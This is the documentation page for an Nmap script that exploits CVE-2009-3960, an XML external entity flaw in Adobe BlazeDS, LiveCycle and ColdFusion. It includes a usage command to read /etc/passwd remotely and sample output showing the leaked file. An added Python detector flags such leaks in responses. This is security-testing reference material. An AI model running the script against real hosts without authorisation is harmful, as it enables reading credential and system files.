
File http-vuln-cve2009-3960

Script types: portrule
Categories: exploit, intrusive
Download: http://nmap.org/svn/scripts/http-vuln-cve2009-3960.nse

User Summary

Exploits CVE-2009-3960, also known as Adobe XML External Entity Injection.

This vulnerability allows local files to be read remotely and is present in BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0.

For more information see:

Script Arguments

http-vuln-cve2009-3960.root

Points to the root path. Defaults to "/"

http-vuln-cve2009-3960.readfile

Target file to be read. Defaults to "/etc/passwd"

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.showall

See the documentation for the vulns library.

Example Usage

nmap --script=http-vuln-cve2009-3960 --script-args http-vuln-cve2009-3960.root="/root/" <target>

Script Output

PORT   STATE SERVICE
80/tcp open  http
| http-vuln-cve2009-3960:
|     samples/messagebroker/http
|     <?xml version="1.0" encoding="utf-8"?>
|     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash
|     bin:*:1:1:bin:/bin:/sbin/nologin
|     daemon:*:2:2:daemon:/sbin:/sbin/nologin
|     adm:*:3:4:adm:/var/adm:/sbin/nologin
|     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
|     sync:*:5:0:sync:/sbin:/bin/sync
|     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
|     halt:*:7:0:halt:/sbin:/sbin/halt
|     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
|     news:*:9:13:news:/etc/news:
|     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
|     operator:*:11:0:operator:/root:/sbin/nologin
|     games:*:12:100:games:/usr/games:/sbin/nologin
|     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
|     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
|     nobody:*:99:99:Nobody:/:/sbin/nologin
|     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
|     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
|     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
|     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
|     ...
|_
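
A defender-side check for the leak shown in the output above, as an added example that is not part of the Nmap script or its documentation: it scans an HTTP response body (or the script output itself) for an AMFX document whose `<string>` element carries passwd-format records. The function name, the sample bodies and the three-record threshold are assumptions made for this example.

```python
import html
import re

# One passwd(5) record: name:password:UID:GID:GECOS:home:shell
PASSWD_RE = re.compile(
    r"^([a-z_][a-z0-9_.-]*):[^:\n]*:(\d+):(\d+):[^:\n]*:[^:\n]*:[^:\n]*$", re.I
)
# Text of each AMFX <string> element; tolerates a body cut off before </string>.
STRING_RE = re.compile(r"<string>(.*?)(?:</string>|\Z)", re.S)
MIN_RECORDS = 3  # assumed threshold: isolated look-alike lines are ignored


def leaked_accounts(body: str) -> list[tuple[str, int]]:
    """Return (name, uid) pairs for passwd records inside one AMFX <string>."""
    if "<amfx" not in body:
        return []
    for raw in STRING_RE.findall(body):
        records = []
        for line in html.unescape(raw).splitlines():
            # Also drop the "|     " prefix Nmap puts on script output lines.
            m = PASSWD_RE.match(line.lstrip("| \t").rstrip())
            if m:
                records.append((m.group(1), int(m.group(2))))
        if len(records) >= MIN_RECORDS:
            return records
    return []


# Constructed samples, shortened from the response format shown in Script Output.
_HEAD = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<amfx ver="3"><body targetURI="/onResult" responseURI="">'
    '<object type="flex.messaging.messages.AcknowledgeMessage">'
    "<traits><string>timestamp</string><string>body</string></traits><null/>"
)
SAMPLE_LEAK = _HEAD + (
    "<string>root:x:0:0:root:/root:/bin/bash\n"
    "bin:*:1:1:bin:/bin:/sbin/nologin\n"
    "daemon:*:2:2:daemon:/sbin:/sbin/nologin\n"
)
SAMPLE_OK = _HEAD + "<string>CONSTRUCTED-ID</string></object></body></amfx>"

if __name__ == "__main__":
    for name, body in (("leak", SAMPLE_LEAK), ("ok", SAMPLE_OK)):
        print(name, leaked_accounts(body))
```

Run against responses from message broker endpoints at a proxy or WAF, a non-empty result means file contents reached the client and the host needs patching and incident handling.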

Requires


Author: Hani Benhabiles

License: Same as Nmap--See http://nmap.org/book/man-legal.html
